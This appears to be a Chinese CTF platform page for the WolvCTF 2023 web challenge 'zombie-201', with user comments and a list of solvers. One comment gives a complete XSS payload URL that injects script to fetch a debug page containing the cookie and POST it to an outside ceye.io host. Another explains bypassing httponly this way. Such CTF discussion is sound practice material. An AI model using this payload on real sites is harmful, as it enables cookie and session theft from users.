zombie-201WEB 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 56
提  示:
描  述:
wctf{}
评论
vincentshine 8月前

http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>

回复 0

justsosoloveyou 1年前

httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。

回复 7

WriteUp

image
zzhicecyb

0 金币

评分(0)

暂无评分

解题动态

cjydawn 攻破了该题 13天前
nuxe 攻破了该题 16天前
15008241322 攻破了该题 27天前
脆脆sha_ 攻破了该题 1月前
ting006 攻破了该题 3月前
max333 攻破了该题 4月前
yh1824159516 攻破了该题 4月前
王大炮 攻破了该题 4月前
iictfii 攻破了该题 4月前
A1234467 攻破了该题 4月前
excnir 攻破了该题 5月前
dir_tree 攻破了该题 5月前
Jokerz 攻破了该题 6月前
zzhicecyb 攻破了该题 6月前
blackkkkkk 攻破了该题 6月前
admin6669 攻破了该题 6月前
whileangel 攻破了该题 6月前
ZIO2020 攻破了该题 7月前
sraiL 攻破了该题 7月前
n0th1n9 攻破了该题 7月前
问题反馈